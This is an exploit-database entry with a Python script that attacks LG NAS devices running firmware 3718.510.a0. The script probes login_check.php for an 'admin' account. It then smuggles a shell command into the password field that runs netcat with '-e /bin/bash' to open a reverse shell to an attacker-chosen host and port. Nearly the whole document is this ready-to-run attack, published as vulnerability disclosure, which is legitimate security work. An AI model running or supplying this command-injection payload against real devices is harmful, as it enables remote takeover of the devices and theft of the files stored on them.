LG NAS 3718.510.a0 - Remote Command Execution

EDB-ID:

45109

CVE:

N/A


Author:

0x616163

Type:

webapps


Platform:

Hardware

Date:

2018-07-31


# LG NAS 3718.510.a0 - Remote Command Execution
# Author: @0x616163
# Date: 2018-07-29
# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
# CVE: N/A
# Firmware Version: 3718.510.a0

#!/usr/bin/env python

import sys
import argparse
import requests
from collections import OrderedDict

def checkUser(target):
	# Exploiting this vulnerability requires a valid user account
	# on the target NAS otherwise the vulnerable code is not executed
	parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
	r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
	if r.text == "NG:WRONG PASSWORD\n":
		print "[*] Valid user found: admin"
		return 0
	elif r.text == "NG:NO USER\n":
		print "[*] User not found: admin"
		sys.exit(1)

def sendPayload(target,lhost,lport):
	print "[*] Sending payload.."
	try:
		parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
		r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
	except requests.exceptions.ReadTimeout:
		print "[*] Payload sent. Exiting."
		sys.exit(0)

	return 0
def main():
	parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
	parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
	parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
	parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
	results = parser.parse_args()
	args = vars(results)
	if len(sys.argv) < 1:
		parser.print_help()
		sys.exit(1)
	else:
		if checkUser(args['target']) == 0:
			sendPayload(args['target'], args['lhost'],args['lport'])

main()
sys.exit(0)